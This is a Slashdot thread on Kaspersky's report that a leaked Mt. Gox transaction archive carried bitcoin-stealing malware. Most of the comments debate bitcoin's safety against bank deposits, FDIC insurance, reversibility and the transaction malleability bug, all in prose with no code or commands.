Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."

Really?

[SternisheFan]

Oh yes, I totally trust easily manipulated computer bits over paper money.

Re:Really?

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Re:Really?

[SternisheFan]

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

Re:Really?

Banks are properly regulated and insured, so no, a bank's customers would not lose money due to any digital shenanigans.

Re:Really?

[ttucker]

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

Re:Really?

[Ralph+Wiggam]

How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

When someone steals real money from a bank, it is insured by the FDIC.

The impact is way, way worse with bitcoin.

Re:Really?

The difference is, this has happened to a bigger swath of bitcoin than it ever could to a bank.

Re:Really?

Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

So far no one has managed to exploit bitcoin itself.

Re:Really?

[SternisheFan]

Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy'' hurdle.

Re:Really?

[exomondo]

...except this was no different from someone doing the same thing to a bank.

It's totally different! Unlike a normal bank bitcoin transactions are irreversible, untraceable and the deposits are uninsured, the whole thing is unregulated and anonymous by design.

Re:Really?

[bill_mcgonigle]

Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

Re:Really?

[zieroh]

Real coin has worked for thousands of years.

Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

Re:Really?

[DarkOx]

Except Mt.Gox was never a bank, if anything its more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered some how by authorities.

Re:Really?

[mysidia]

Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

NOPE! And I assure you, this mode of payment is not thousands of years old.

For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones. Chances are you didn't even put in "real dollars though" ---- you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything, because they were also most likely all paid by credit card, checo or DD.

Re: Really?

Bit coin is reliable. The shitty exchanges are not.
If you have someone access to your paper wallet then the effect would be the same.

Re:Really?

[mysidia]

Bitcoin has not proven itself to be a reliable way to store money.

Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

Re:Really?

[mysidia]

no bitcoin transactions are ever reversible.

No cash transactions are ever reversible.

[And Bitcoin is a form of cash.]
There, fixed it for you.

Re:Really?

[sphealey]

- - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

Another crytocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

sPh

Re:Really?

[Kjella]

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

That's generally false for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to cease. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

Re:Really?

[mysidia]

When someone steals real money from a bank, it is insured by the FDIC.

Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

WP has some other examples of items not insured by the FDIC, also not covered:

Investments backed by the U.S. government, such as US Treasury securities

The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.
Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

Insurance and annuity products, such as life, auto and homeowner's insurance.

Re:Really?

[mbkennel]

| Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

Fiat currency is not "by fiat" automatically exchangable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

Bitcoin isn't by fiat exchangable for anything either---it only has constructed scarcity.

| The fed and the banks just will "federal reserve" monopoly bucks into existence.

Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.

Re:Really?

[mysidia]

The difference is, this has happened to a bigger swath of bitcoin than it ever could to a bank.

Not if the 'bank' was as negligent as Mt.Gox was, and still managed to elude any regulators.

Re:Really?

[Kris_J]

• These are not "easily manipulated", they are cryptographically secure.
• There is zero counterfeit bitcoin. You can't say the same about paper currency.
• This isn't about the security of bitcoin, it's about phishing and trojans.

Re:Really?

[beelsebob]

Right... because this happens so often with banks. We see a bank go pop, and everyone's money disappear every month or so, don't we.

And you know... the government doesn't insure money held in bank accounts. It's completely the same.

Re:Really?

Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

Plenty of people had their banking details stolen every day.
Ever heard of ATM skimmers?

If it's on my table, I hope your shotgun is bigger than mine.

Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud. What is your 'pro Bitcoin' arguement again?

Re:Really?

[wallsg]

Except Mt.Gox was never a bank, if anything its more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered some how by authorities.

Incorrect. SIPC (Securities Investor Protection Corporation) insurance protects cash up to $250,000 and cash and securities up to $500,000 per account. Most brokerage firms carry additional insurance, usually called "excess SIPC coverage".

Mt. Gox was the tavern bookie that you left your winnings with, with no insurance or regulation at all.

Re:Really?

[wallsg]

And I totally agree with your signature calling for the repeal of the 17th Amendment.

Re:Really?

[Opportunist]

Actually, yes, it does matter. That's like saying "online banking is insecure" when in fact pretty much all exploits on online banking (at least in Europe) worked only due to negligence on the user's side. I know of not a single case where it was actually the bank's fault. And trust me, there are FAR, FAR more cases than you'll ever hear about (banks tend to pay, i.e. take over the cost for the users' idiocy to hush it up).

Re:Really?

[QilessQi]

As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

Re:Really?

[Stormy+Dragon]

For the most recent year in which statistics have been published (2011), 5,086 times, resulting in a loss of $38,343,501.96, only $8,070,886.97 was ever recovered.

http://www.fbi.gov/stats-servi...

Re:Really?

[QilessQi]

And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

Re:Really?

[Stormy+Dragon]

Between 2008 and 2012, 465 separate US banks failed:

http://en.wikipedia.org/wiki/L...

Re:Really?

What is your 'pro Bitcoin' arguement again?

I use linux.

Re: Really?

[Gunboat_Diplomat]

Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

Re:Really?

[Thetawaves]

Bitcoin theft is still theft. There is plenty of legal recourse.

Re:Really?

You think the money in your bank account is paper, and not easily manipulated computer bits? That's so cute.

Re:Really?

[aardvarkjoe]

And if you read the article you linked to, you'll realize that people's deposits didn't just disappear, even when the banks failed.

Re:Really?

[ThatsMyNick]

Keep a paper bitcoin wallet. It as simple as that.

Re:Really?

Bitcoin is still the wild west of the internet and anybody who isn't ready for that should not venture out there and take those risks.

Easy security and other consumer friendly features like arbitrators who provide consumer protection via multi-signature transactions are coming. Right now there ain't no law in deadwood.

Re:Really?

Anyone who says fiat currency is not backed by anything is an ignorant idiot and is to be ignored.

(Hint : Fiat is backed by the assets of a country)

Re:Really?

[mysidia]

lol...are you actually trying to make the argument that dollars are just as unsafe as bitcoin?

As unsafe against bitcoin against WHAT?

There are an infinite number of threats against both. Both have certain fragilities.

Therefore... there is no basis of comparison for safety, except when you identify what kinds of shocks or unusual events that you are most concerned about.

But they both seem to be pretty darn risky and likely to be stolen, when we are talking about possibilities of physical theft and certain kinds of digital theft....

Re:Really?

Of course real coins can be stolen. Which is why we don't keep large amounts of cash on hand. We deposit money in banks that are insured so that WHEN people steal money or lose it...which happens invariably, as you point out...depositors have some recourse aside from the cold comfort of knowing the miracle of the "free market" will eventually punish the thieves.

Re:Really?

[TubeSteak]

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

Re:Really?

[ahabswhale]

lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bicoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

Re:Really?

Bitcoin theft is still theft. There is plenty of legal recourse.

There are many people out of pocket that would like to know what their recourse is.

Re:Really?

So you're not just making a copy of the bits and bytes?

Re:Really?

No, you're not. You're also modifying bits and bytes in the distributed ledger on all computers of Bitcoin network.

That's what it makes it different from piracy - if me pirating your favourite "Big Butt Mamas #17" made your legit copy unwatchable, it'd be theft.

Re:Really?

hm so good luck with getting people to wanna live there... there also ain't no gold in them thar hills anymore!!

Re:Really?

[Chas]

Yet you can go to your bank any time and be guaranteed payout in real dollars.
And you have near-zero chance of being screwed over the way these people are by collapsing exchanges.
How likely is it that the US (and thus FDIC) are going to collapse tomorrow, or next week, or a year from now? Maybe there's a chance of it happening, but your chance of getting hit by lightning while simultaneously winning the lottery is better.
How likely is it that one or more of these exchanges is going to fold up and disappear with any funds you may have invested (dollars or BTC). Judging on recent trends, the probability is a HELL of a lot closer to One than it is to Zero.

BTC itself is a Ponzi scheme.
Exchanges are confidence scams.

Can people make money in both situations? SURE!
Just don't fool yourself as to what you're doing.

Re:Really?

[CanHasDIY]

No cash transactions are ever reversible.

They are if you keep the receipt.

Re:Really?

This is totally false. Almost all bank transactions are reversible in the case of fraud

A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

Re:Really?

If it were that easy to rob a bank, I would't trust banks either.

Re:Really?

Except the part that online bitcoin transactions are analogous to online or wire currency transactions not cash. online or wire transactions in most currencies are reversible or failing that covered by fraud protections or FDIC if proven fraudulent.

bitcoin transactions are analogous to cash transactions when printed out and physically handed to a person.

Re: Really?

[mlts]

BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

Re: Really?

There are an equal number of trojans and other malware designed specifically to steal money from people using online banking.

But still.. you are blaming the way the exchanges were run on bitcoin itself. That is as dumb as saying paper money is unsafe because people rob banks (which they do https://en.wikipedia.org/wiki/...).

Re:Really?

Good luck getting a jury to believe that. The average Joe sees a photo on the screen of a piece of paper with a QR code on it, thinking that BitCoin is a modified paper currency. It wouldn't be hard for a defense attorney to say that it was as big a deal as a swindle in World of Warcraft where someone sold a blue item for a purple's price.

Re:Really?

[click2005]

Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud. What is your 'pro Bitcoin' arguement again?

US Dollars are also not a bank or a credit card company so why are you trying to compare a form of currency to something its obviously not?

Re:Really?

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Right, because when I request a copy of my transaction data from my bank, it comes with malware implanted in the paper.

Re:Really?

CBA to search for it, but a few months ago there already was a court case in USA against a conman who collected BTC from easy trusting marks and ran.

He tried to get out of court by playing the same "Bitcoin is no money, can't prosecute me, nyahnyahnyah!" card you propose, but got slapped down by the judge.

Re:Really?

It matters, in the same way that it matters whether or not your bank hires actual security guards or a safe made of thick steel rather than plastic. If your bank kept your money in a very insecure vault and the money was then stolen you would blame the bank, not the currency. Bitcoin is no different.

Re:Really?

Transaction malleability does not allow you to magically steal coins. Blame the website that allowed a supposed cold wallet get drain automatically. There's not even any actual evidence that they were stolen in a hack. Karpeles could have just walked off with them.

Re:Really?

Better send that news over to the US federal reserve.

Re:Really?

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

If you think that's true, then you have no real understanding of fiat currency at all.

For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones.

You obviously don't understand how banks work either.

you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything

You most certainly don't understand how accounts work at all. Put simply, yes all that money does have a physical bill or coin somewhere.

Re:Really?

The blockchain transactions aren't reversible, but neither are bank ledger transactions.

If you think that's actually a true statement, then I've got a Nigerian Prince who needs help getting his money to a safe country, and is going to send you a Cashier's Check for $1,000,000. Just deposit it into your account, then keep $100k for yourself and have your bank send a Cashier's Check for $900,000 to a bank in this other country.

Bank transactions not only CAN be reversed, they frequently are. But just in case you need a full explanation, here's what happens: The check you wrote gets cashed out in some country where they don't care about your country's laws, shortly after that the original check you received gets reversed because it's fraudulent. You can't get the $900,000 back because the bank in the country you sent it to gives your bank the finger, or is itself an empty "shell" company which doesn't exist... and you're the one stuck owing the $900,000 to YOUR bank in YOUR country.

Re:Really?

What about 2008????

Re:Really?

Your third point is incorrect, there is quite a bit of currency floating around which has never had a bill or coin minted for it. The federal reserve guarantees banks an amount of money, and that money is transacted between banks as a result of everyday activity of customers. The reserve does guarantee that the funds can be minted at will, but the amount of actual currency in circulation is dwarfed by that which is just numbers on ledgers.

Re:Really?

What's the alternative? Fiat? Ask the Cypriots how secure that is!

Re:Really?

Sure, let's. People with up to 100K EUR got it back, and those who had more, got 40% of their savings seized.

Now let's hear it for Bitcoin side. So, how much did all the MtGox users get refunded? How about all the other crashed Bitcoin "enterprises"?

I think about the only big case where third party properly refunded BTC investors was, ironically, ponzi.io.

Re:Really?

[gmhowell]

Did you have a point to your rant?

Re:Really?

[Stormy+Dragon]

The fact someone showed up later to replace the money doesn't change the fact that the money disappeared. And the FDIC doesn't cover money lost due to theft or fraud. How about people who invested with people like Bernie Madoff?

Re:Really?

[ThatsMyNick]

Not sure why that was moderated as overrated. Just to be clear that was not a joke. If you create paper wallets, and store your bitcoins in them (in whatever denominations you like, I use 1 BTC per wallet), no virus or malware or some e-wallet getting hacked, can get to your bitcoins.

Re:Really?

[ras]

As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result.

Your understanding is wrong. The mtgox fiasco didn't occur because the miners accepted malleable transactions. It happened when the miners stopped accepting transactions that were malleable. Well, not all malleable transactions. But they did stop accepting the invalid transactions mtgox was generating. Generating those invalid transactions was mtgox bug 1. Mtgox bug 2 was when people fixed their bad formatting and they were accepted the block chain, mtgox software didn't recognise them. Mtgox bug 3 was they they then repeated the same transaction without doing a full audit of their ledger to verify some other mistake hadn't been made. Doing it twice is a bit of a risk given bitcoin transactions aren't reversible. But to be fair, mtgox said they authorised such double spends manually.

But ... it is almost inconceivable that a human authorised $350M in double spends without getting suspicious. So that brings us to the unknown mtgox bug 4. Somehow, they managed to figure out a way of authorising $350M in double spends without anybody noticing. Surely this must quality for the Guinness Book of Records greatest accounting cluster fuck of all time.

But bitcoin protocol bug - sorry no, not this time. Bitcoin offers very few guarantees. I guess a known mining rate, whatever appears on the audit trail is the one and only correct history of bitcoin, and that history will never change are the main three. In the early days, back when people sent 1000's of bitcoins to pay for a pizza, there were bugs that in the bitcoin software that meant those guarantees weren't upheld. But it was also a nicer time. It was when bitcoin was just a toy friends played with, so such mistakes could be and were always fixed. No bitcoin has every been permanently lost because because of such bugs.

I know I shouldn't care when a person on the internet is wrong. Not just a little bit wrong, but tinfoil hat type wrong as you are in this case. But seeing tinfoil hat comments being modded up to +5 is difficult to swallow silently.

Re:Really?

[ras]

How often does someone break into a bank vault? ... The impact is way, way worse with bitcoin.

How do you know? It has never happened. There is only one bitcoin banker - it's the miners. There is only one bank statement issued by those bankers, and that's the block chain. So far the miners have never lost a bitcoin. You can verify that yourself. The block chain is a public document. I think it's fair to said bitcoin is built on the fact that they never will. It's a pretty safe bet, because if the bitcoin software adheres to the protocol description, mathematically, they never can.

If you give your bitcoins to a broker like mtgox, well anything can happen. In fact if you can name something an imbecile or criminal could do to you if trusted them with your money, then in the bitcoin world it probably has happened. Some brokers didn't bother with backups. Some were minors, and literally stole the bitcoins they were given. Some (including mtgox) leaked passwords they were given. The list is beyond belief, and is responsible for all the headlines you see.

But your fantasy of the the vault all bitcoin is stored in being raided - that has never happened. One of the beauties of bitcoin is it is probably impossible. Indeed bitcoin is immune to most of the foibles of normal bankers. The bitcoin banker doesn't loan bitcoins. It doesn't make mistakes. Unlike fiat currencies the people who control it can't inflate it into worthlessness.

Re:Really?

[sfcat]

Right, cause this never happened...in the last 12 months?

http://www.bbc.com/news/busine...

Look, people are involved and people are fallible and technology can't really prevent that. BTC as a protocol is solid and wasn't comprised. The very immature institutions that have sprung up around BTC are currently failing at their task that you have every right to criticize them. Hopefully the market will sort out some winners that can function in their institutional roles in the BTC ecosystem safely and securely.

But don't confuse BTC for a bank and right now don't confuse it for a currency. Currently, BTC is a commodity because of its volatile value against fiat currencies. Someday that might change at which point BTC begins behaving like a currency. It fills/will fill a real need for many people, probably not you but others and that's what really matters here. When the BTC institutions can behave in as secure and trustworthy a way as other financial institutions (and really is that a very high bar anymore) then it will be very much like any other currency with a measurable market cap and liquid exchanges. Until then its volatile and probably only for miners and speculators (and gamblers).

And a ponzi scheme always needs an increasing amount of money to keep going (ie next year more $$ needs to go in than last year). That doesn't seem to be a feature of the Bitcoin ecosystem. Ask any miner and they've gone through peaks and valleys due to volatile prices and changing difficulties that brings the system into balance. It always balances out, the good and the bad (ie bad you paid 47 BTC for a ASIC miner in August 2013 that probably will never mine 47 BTC, good your other 147 BTC are now worth 80k USD). Its hard and rare to get rich honestly with BTW but you can make a bit of extra cash right now and that's a feature of a healthy and growing market.

Re:Really?

[ras]

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

Only for some definition of "totally" that does mean 100% of transactions. And when you get to the the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

From http://www.globalgrainsvn.com/GGS/MT103.html:

SWIFT MT-103

SWIFT MT-103s are the most commonly used form of SWIFT communication, and one which many people will have utilized without even knowing it. For most bank customers, they are known not as MT-103s at all, but rather as wire transfers, telegraphic transfers, or SWIFT transfers. A SWIFT MT-103 is used by the bank when its customers wish to make payment to customers of another bank in another country.

How Do I Send A MT-103 ?

An MT-103 is the most commonly utilized type of SWIFT message. In order to send one, simply contact your bank and let them know that you would like to send a telegraphic or wire transfer. They will require the recipient’s bank details, and also the SWIFT code of the recipient’s bank. If the recipient is not aware of their bank’s SWIFT code, it is a fairly simple matter for the recipient to inquire at their bank.

Are MT-103s Reversible?

No. Once a MT-103 has been made, it is not reversible. Sending a MT-103 is the equivalent of handing someone cash in many respects, so due care should be taken when initiating a MT-103.

Re: Really?

Except the money in your bank account is FDIC insured. Bitcoin? Good luck with that.

Re:Really?

[ttucker]

This is totally false. Almost all bank transactions are reversible in the case of fraud

A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

Sure, I will help them figure out how to hire a lawyer. Or you can pass the message along.

Re: Really?

It doesn't matter how many ways you frame it:

1) The most reliable way of storing my money is with a party who employs dozens of people to make sure my stuff isn't taken;

2) And who is regulated by law into making sure that they do this responsibly;

3) And who will pay out of pocket anyway if my money is lost thanks to someone else;

4) And whp has the slack taken up by government if the whole institution collapses, so I /still/ don't lose my money.

tl;dr saving bitcoin is like dealing with century-old banks.

And I would of course rather store my money with a regular bank than anything bitcoin, because bitcoin keeps a transaction history, whereas real money is more anonymous (god knows how the doublethink machine managed to get bitcoin thought of as "untraceable", but Internet Libertarianism has become like a religion, where every real world factor is simplified away until the desired result is concluded).

Re: Really?

WTF are you on about. My bank has access to all my money and guess what? None of it goes missing.

Re:Really?

[bentcd]

(...) But to be fair, mtgox said they authorised such double spends manually.

Did this manual process by any chance involve a "Yes To All" button?

Re:Really?

[mvdwege]

Really? So the depositors got their money back from government-backed insurance?

Fuck off back to La-La-land, please.

Re:Really?

> The mule is of course a hobo or something with no assets to cease.
*seize

Re:Really?

My bank is insured against the loss of my money. How many people have gotten their Bitcoins back?

Re:Really?

[swb]

Does this prove the grandparent's point, though?

The average take is only $7,539.02.

Even though only 20% is recovered, the clearance rate for bank robberies is like 60%. This says to me that the amounts taken are so small that even if you ultimately get caught, the amount stolen is small enough that a lot of it gets spent quickly before the robbers are caught. It doesn't seem likely that most bank robbers are doing 20 year Federal prison sentences to recover a haul of $7500 when they get out.

Re: Really?

[xvan]

You're proposing this from an american point of view... There are countries with other issues. Banks collapse in the rest of the world, and people don't get their money immediately back. As banks sometimes collapse in inflationary periods, you are effectively being stolen by banks and governments.

Re:Really?

except no less than 20 posts corrected your misinformation.

at least 3 of 5 of your "facts" were incorrect.

mod 5? I wouldn't trust slashdot mods any more than I'd trust bitcoin.

bitcoin has serious problems, but your analogy is severely broken, and does nothing to describe truth.

Re: Really?

The value and stability of currency isn't an intrinsic thing. It comes with the backing of authority, and banks and exchanges that are regulated and have standards. All these things bitcoiin lacks, because it's essentially an electronic Beanie Baby.

Re:Really?

[sociocapitalist]

lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bicoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

Your bank probably got bailed out already and you probably helped pay for it so yes, it does shit to you. Probably not as much as if it failed directly (depending on your bank account balance at the time) but you were not unaffected.

Re:Really?

[QilessQi]

Not so fast, Ras. I said that transaction malleability was exploited by hackers; it was. My only error was confusing the Mt.Gox incident with the Silk Road 2 incident. Here, from the very first paragraph of this Tech Crunch article ( http://techcrunch.com/2014/02/... )

Silk Road 2 moderator Defcon reported in a forum post that hackers have used a transaction malleability exploit to hack the marketplace. The hackers stole over 88,000 4474.26 bitcoins worth $2,747,000, emptying the site’s escrow account.

The site used a central escrow service to send bitcoins from buyers to sellers. The hackers exploited the transaction malleability bug – essentially a way users can mask transfers and ask for the same amount of BTC multiple times – to clean out this wallet. This is the same bug that forced Mt. Gox to halt all withdrawals and recent updates have made average bitcoin wallets secure against this sort of attack. According to the site, hackers used the Silk Road’s automatic transaction verification system to order from each other and then request refunds for unshipped goods. Hackers were able to use the transaction malleability bug because the Silk Road used only transaction ID to confirm the transfer of bitcoins. You can read more about the problem here.

The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited. I think I can be forgiven for having confused one multimillion dollar Bitcoin loss with another caused by the same underlying problem. :-)

But Mt.Gox and Silk Road 2 and every other incident is immaterial when taken individually. As I said in my post, let's leave that aside for a minute and focus on the real issue. I have seen people tying themselves in knots to defend Bitcoin exactly-as-is when that energy would be far better spent acknowledging the weakness in the ecosystem and laying out clear plans to eradicate them. Your own reply speaks about the Mt.Gox fiasco as if losing 350M to incompetence is somehow better than losing it to a targeted attack. The longer people deny the existence of these problems with the existing ecosystem, the longer it will take for cryptocurrencies to find a firm footing in the world. Which I think is a shame.

Finally, as for your "tinfoil hat" comment.... save the name-calling for the conspiracy theorists, of which I am not one. I have only said what many have said already, that Bitcoin is not yet ready for adoption by the masses. It currently, currently, lacks the necessary economic infrastructure to be used safely and effectively by the public. I don't know why that easily-supported statement bruises so many feelings.

Re: Really?

[conquistadorst]

Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

Except nobody's paper wallet is connected to the internet, and few people carry significant hordes of cash in their wallet anyway so this isn't really a fantastic comparison. Yes, one could say, "well you can move it offgrid" then you can also do the same thing with your wallet and toss it in a safe or bank security box, only then would they become equals?

That being said, your wallet is anything but a "safe" place but I'd still say a networked computer is worse. Bitcoins on a networked computer would be probably be akin to someone leaving their cash in a safe, unattended, in an inconspicuous, publicly accessible place.

Re:Really?

[master_kaos]

Um, actually there has been a problem with bitcoin itself with a forked chain causing double spend issues http://www.reddit.com/r/Bitcoi...

Re:Really?

Surely this must quality for the Guinness Book of Records greatest accounting cluster fuck of all time.

I think Enron retains the crown there.

Re:Really?

[hendrips]

While you are absolutely correct that none of these types of losses are covered by FDIC insurance, they are all covered by some kind of insurance. Your own post mentions that losses from fraud and theft are covered by special private liability insurance. Treasury bonds are backed by the full faith and credit of the U.S. government. Insurance and annuities are almost always insured by the state that the bank is operating in, usually up to somewhere between $250k and $500k. So his point is still valid - pretty much any financial product* that you can get from a regulated bank is insured on your behalf by someone up to at least 250k.

*Excluding of course products that are deliberately risky, such as if they offer a brokerage service to invest in the stock market.

Re:Really?

[IndustrialComplex]

Yes. The 'how' is very important.

If a plane suddenly crashes mid-flight, and I'm due to fly on that same model next week, I'd be concerned. If the crash was due to a fundamental flaw in the fuselage, I'm cancelling my flight. If it turns out the crash was due to the plane flying over rebel-held lands and being shot by a missile, my concern about my flight from Maryland to Vermont is greatly reduced.

Re:Really?

BZZT Wrong! You don't have to keep your money stored on MT. Gox to sell it. How much did I lose? 00000000000000! Yes, it's more convenient for sure, but it's also far more dangerous.

Re:Really?

Way to whistle past the graveyard, there.

Re:Really?

[TheCarp]

Yes, because real coins have never been stolen. If it ever happened we might need to invent a new term like....bank robbery or something.

You are aware, I would hope, that the GPs point was that real banks use digital legers too, and in fact do not keep most of their money in "Real coin" at all. Not only that but, using whatever manner works to steal real coin, including by the use of malware to cause changes in digitally stored legers, is actually a way your precious real coin gets stolen now.

There is even a big company that suffered some large thefts...maybe you heard of them Target? How about TJX?

Re:Really?

[InvalidError]

Only if the merchant or whoever you concluded the transaction with agrees to reverse it and even then, the refund is still a separate transaction from the original payment.

A crook can give you a "receipt" and vanish from your life or make excuses to refuse refunds just about as easily with real cash as Bitcoins.

The main differences are that Bitcoin is mostly used in higher-risk transactions and does nor have any legal protections anywhere so if you get screwed, you have little if any legal protection.

Re:Really?

[squiggleslash]

Right, and when people say "Oh, that was a computer error" when a computer doesn't give them the answers they want, they're wrong too, it's actually something wrong with how the computer was programmed.

Or, maybe, perhaps, just maybe, when people say "Bitcoin" they mean "The system associated with Bitcoin", which right now is intentionally unregulated, intentionally over-automated, intentionally unreversable, has not addressed banking because of ideological considerations despite widespread use of Bitcoin banks proving the concept is necessary, and so on.

Re:Really?

The problem isn't with bitcoin, the protocol. It's rock solid, every bit as good as cash. The problem is the lack of any infrastructure (legal institutions, insurance, etc.) on top of the protocol.

Re:Really?

[squiggleslash]

And when you get to the the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

